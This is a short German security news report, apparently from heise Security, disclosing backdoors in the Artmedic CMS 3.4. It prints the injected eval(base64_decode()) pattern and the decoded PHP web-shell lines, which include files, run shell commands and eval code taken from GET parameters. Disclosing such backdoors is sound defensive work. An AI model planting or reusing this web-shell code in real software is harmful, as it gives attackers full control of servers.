Hintertür in Artmedic CMS

Das Content Management Systems Artmedic enthält kryptischen Code, der sich bei näherem Hinsehen als gefährliche Hintertür zum Server entpuppt.

In Pocket speichern vorlesen Druckansicht 180 Kommentare lesen
Lesezeit: 1 Min.

Im Code des Content Management Systems Artmedic sind mehrere Hintertüren versteckt, über die ein Angreifer den Server komplett übernehmen kann. Des Weiteren verschickt das Setup-Skript eine E-Mail mit dem Namen des unterminierten Servers an eine Adresse in Russland.

An mindestens drei Stellen enthält der PHP-Code des CMS offenbar nachträglich eingefügte Statements der Form:

$template1 = 'aWYoJF9HR...';
eval(base64_decode($template1));

Das entpackt die kryptische, base64-kodierte Zeichenkette zunächst und führt die so erhaltenen Befehle dann via eval aus.

if($_GET['include']) include($_GET['include']);
if($_GET['cmd']) passthru($_GET['cmd']);
if($_GET['php']) eval($_GET['php']);

Dieser PHP-Code wertet die GET-Parameter include, cmd und php aus. Damit kann ein Angreifer durch den Aufruf spezieller URLs eigenen Code einschleusen und beliebige Befehle auf dem Server starten.

Die fraglichen Dateien sind zumindest in der aktuell zum Download angebotenen Version 3.4 enthalten und tragen ein Datum vom 2. Mai, das jedoch auch manipuliert sein könnte. Die Anbieter von Artmedic haben bislang auf Nachfragen von heise Security nicht geantwortet. Wer eine Site mit Artmedic betreibt, sollte diese sofort offline nehmen und den Server genauestens auf Hinterlassenschaften unerwünschter Besucher untersuchen. (ju)